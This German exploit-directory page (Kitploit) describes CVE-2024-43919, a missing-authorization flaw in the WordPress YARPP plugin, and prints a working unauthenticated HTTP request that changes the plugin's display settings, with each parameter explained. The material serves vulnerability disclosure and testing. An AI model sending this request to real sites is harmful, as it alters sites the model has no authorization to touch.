Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-43919 — YARPP <= 5.30.10 - Fehlende Autorisierung | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-43919
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsFehlkonfiguration
GitHubrandomrobbiebf/cve-2024-43919

CVE-2024-43919

YARPP <= 5.30.10 - Fehlende Autorisierung

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-43919

YARPP <= 5.30.10 - Fehlende Autorisierung

Beschreibung

Das YARPP – Yet Another Related Posts Plugin für WordPress ist in allen Versionen bis einschließlich 5.30.10 anfällig für unbefugten Zugriff aufgrund einer fehlenden Berechtigungsprüfung in der Datei ~/includes/yarpp_pro_set_display_types.php. Dadurch können nicht authentifizierte Angreifer Anzeigetypen festlegen.

root@kitploit:~
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin

Info

Keine Ahnung, was das eigentlich tut.

POC

Hier ist ein Beispiel einer rohen HTTP-Anfrage, die die Schwachstelle im YARPP-Plugin ausnutzt:

root@kitploit:~
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

In dieser Anfrage:

  • Der Parameter ypsdt wird auf false gesetzt, um die erste Prüfung im Code zu umgehen.
Tool herunterladen
  • Der Parameter types[] wird verwendet, um die festzulegenden Anzeigetypen anzugeben. In diesem Beispiel werden post und page als Typen übergeben.
  • Der Header Host gibt die Ziel-WordPress-Seite an, die das anfällige YARPP-Plugin hostet.
  • Wenn diese Anfrage an eine WordPress-Seite mit einer verwundbaren Version des YARPP-Plugins gesendet wird, werden die Anzeigetypen gesetzt, ohne dass eine Authentifizierung oder Autorisierung erforderlich ist.